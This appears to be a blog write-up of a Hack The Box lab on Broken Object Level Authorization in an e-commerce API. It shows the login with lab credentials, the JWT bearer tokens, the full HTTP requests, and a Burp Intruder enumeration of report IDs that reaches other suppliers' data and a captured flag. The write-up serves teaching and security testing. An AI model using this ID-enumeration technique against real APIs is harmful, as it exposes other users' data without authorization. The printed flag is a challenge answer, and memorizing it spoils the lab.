June 25, 2026
BOLA(Broken Object Level Authorization)
Broken Object Level Authorization (BOLA) is a critical API security vulnerability ranked API1 in the OWASP API Security Top 10. It occurs…
By Ahmed Ali
3 min read
Broken Object Level Authorization (BOLA) is a critical API security vulnerability ranked API1 in the OWASP API Security Top 10. It occurs when an application fails to properly verify whether a user is authorized to access a specific object, such as user accounts, records, files, or other resources. As a result, attackers can view, modify, or delete data that does not belong to them, leading to unauthorized access and sensitive data exposure.
HandsOn Example
We're given a Swagger UI page for an e-commerce web app with 60+ API endpoints and multiple resources:
1) Log in as a supplier
Use the provided credentials to log in:
- Email: htbpentester2@pentestercompany.com
- Password: HTBPentester2
2) Generate a JWT token
Go to the Authentication resource and send a POST request to:
/api/v1/authentication/suppliers/sign-in
Request:
Response:
After a successful login, the server responds with a JWT token:
{
"jwt": "eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWRlbnRpZmllciI6Imh0YnBlbnRlc3RlcjJAcGVudGVzdGVyY29tcGFueS5jb20iLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOlsiU3VwcGxpZXJDb21wYW5pZXNfR2V0WWVhcmx5UmVwb3J0QnlJRCIsIlN1cHBsaWVyc19HZXRRdWFydGVybHlSZXBvcnRCeUlEIl0sImV4cCI6MTc3OTY0MjE0MCwiaXNzIjoiaHR0cDovL2FwaS5pbmxhbmVmcmVpZ2h0Lmh0YiIsImF1ZCI6Imh0dHA6Ly9hcGkuaW5sYW5lZnJlaWdodC5odGIifQ.NvPBf1iR0imuBZyIBGNzhRc4o8g_RJ_wHFaZHrXKA1OJ36V7jHDQB-r9Qxt4QPr4PrT1rGhsbivBAH08sIQn4A"
}{
"jwt": "eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWRlbnRpZmllciI6Imh0YnBlbnRlc3RlcjJAcGVudGVzdGVyY29tcGFueS5jb20iLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOlsiU3VwcGxpZXJDb21wYW5pZXNfR2V0WWVhcmx5UmVwb3J0QnlJRCIsIlN1cHBsaWVyc19HZXRRdWFydGVybHlSZXBvcnRCeUlEIl0sImV4cCI6MTc3OTY0MjE0MCwiaXNzIjoiaHR0cDovL2FwaS5pbmxhbmVmcmVpZ2h0Lmh0YiIsImF1ZCI6Imh0dHA6Ly9hcGkuaW5sYW5lZnJlaWdodC5odGIifQ.NvPBf1iR0imuBZyIBGNzhRc4o8g_RJ_wHFaZHrXKA1OJ36V7jHDQB-r9Qxt4QPr4PrT1rGhsbivBAH08sIQn4A"
}3) Authorize in Swagger UI
In Swagger UI, click the Authorize button (unlock icon indicates you're not authorized yet):
Paste the JWT token and click Authorize:
Once authorization is successful, the icon changes to a lock:
4) Get the current supplier details
Go to the Suppliers resource:
Send a GET request to:
/api/v1/suppliers/current-user
(The lock icon indicates authentication is required.)
Request
Response:
Example response:
{
"supplier": {
"id": "781391c3-c6e3-4f42-bea4-1e71b6d9b4e7",
"companyID": "b75a7c76-e149-4ca7-9c55-d9fc4ffa87be",
"name": "HTBPentester2",
"email": "htbpentester2@pentestercompany.com",
"phoneNumber": "+44 9999 999992"
}
}{
"supplier": {
"id": "781391c3-c6e3-4f42-bea4-1e71b6d9b4e7",
"companyID": "b75a7c76-e149-4ca7-9c55-d9fc4ffa87be",
"name": "HTBPentester2",
"email": "htbpentester2@pentestercompany.com",
"phoneNumber": "+44 9999 999992"
}
}5) Confirm the BOLA (Broken Object Level Authorization)
There are two relevant endpoints for quarterly reports:
GET /api/v1/suppliers/quarterly-reports(all reports)GET /api/v1/suppliers/quarterly-reports/{ID}(single report)
When we try to fetch all suppliers' quarterly reports, we're not authorized:
However, GET /api/v1/suppliers/quarterly-reports/{ID} is vulnerable: if we provide an ID that does not belong to our account, the API still returns report data.
Request
Response
This confirms a BOLA issue because the API does not enforce object-level authorization (it doesn't verify the report belongs to the authenticated supplier).
6) Fuzz IDs to enumerate reports
To enumerate the first 100 IDs, fuzz the id parameter using Burp Intruder:
Example request/response:
GET /api/v1/suppliers/quarterly-reports/8 HTTP/1.1
Host: 154.57.164.69:30545
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWRlbnRpZmllciI6Imh0YnBlbnRlc3RlcjJAcGVudGVzdGVyY29tcGFueS5jb20iLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOlsiU3VwcGxpZXJDb21wYW5pZXNfR2V0WWVhcmx5UmVwb3J0QnlJRCIsIlN1cHBsaWVyc19HZXRRdWFydGVybHlSZXBvcnRCeUlEIl0sImV4cCI6MTc3OTY0NTUyMSwiaXNzIjoiaHR0cDovL2FwaS5pbmxhbmVmcmVpZ2h0Lmh0YiIsImF1ZCI6Imh0dHA6Ly9hcGkuaW5sYW5lZnJlaWdodC5odGIifQ._OBQ9wKn_HVCDs4FewLLZvaB08zE4EKhxh_94HxbPvLJBnRgRbgcztr5_lRLC-7MzyD4iq-eu3qmAcWX7kcj0Q
Accept-Language: en-US,en;q=0.9
accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Referer: <http://154.57.164.69:30545/swagger/index.html>
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Sun, 24 May 2026 17:39:58 GMT
Server: Kestrel
Content-Length: 193
{"supplierQuarterlyReport":{"id":8,"supplierID":"b2d1a1a9-d5bb-4973-bbe4-9a605b6f0da4","quarter":3,"year":2023,"amountSold":10000,"commentsFromManager":"HTB{e76651e1f516eb5d7260621c26754776}"}}GET /api/v1/suppliers/quarterly-reports/8 HTTP/1.1
Host: 154.57.164.69:30545
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWRlbnRpZmllciI6Imh0YnBlbnRlc3RlcjJAcGVudGVzdGVyY29tcGFueS5jb20iLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOlsiU3VwcGxpZXJDb21wYW5pZXNfR2V0WWVhcmx5UmVwb3J0QnlJRCIsIlN1cHBsaWVyc19HZXRRdWFydGVybHlSZXBvcnRCeUlEIl0sImV4cCI6MTc3OTY0NTUyMSwiaXNzIjoiaHR0cDovL2FwaS5pbmxhbmVmcmVpZ2h0Lmh0YiIsImF1ZCI6Imh0dHA6Ly9hcGkuaW5sYW5lZnJlaWdodC5odGIifQ._OBQ9wKn_HVCDs4FewLLZvaB08zE4EKhxh_94HxbPvLJBnRgRbgcztr5_lRLC-7MzyD4iq-eu3qmAcWX7kcj0Q
Accept-Language: en-US,en;q=0.9
accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Referer: <http://154.57.164.69:30545/swagger/index.html>
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Sun, 24 May 2026 17:39:58 GMT
Server: Kestrel
Content-Length: 193
{"supplierQuarterlyReport":{"id":8,"supplierID":"b2d1a1a9-d5bb-4973-bbe4-9a605b6f0da4","quarter":3,"year":2023,"amountSold":10000,"commentsFromManager":"HTB{e76651e1f516eb5d7260621c26754776}"}}Flag obtained:
HTB{e76651e1f516eb5d7260621c26754776}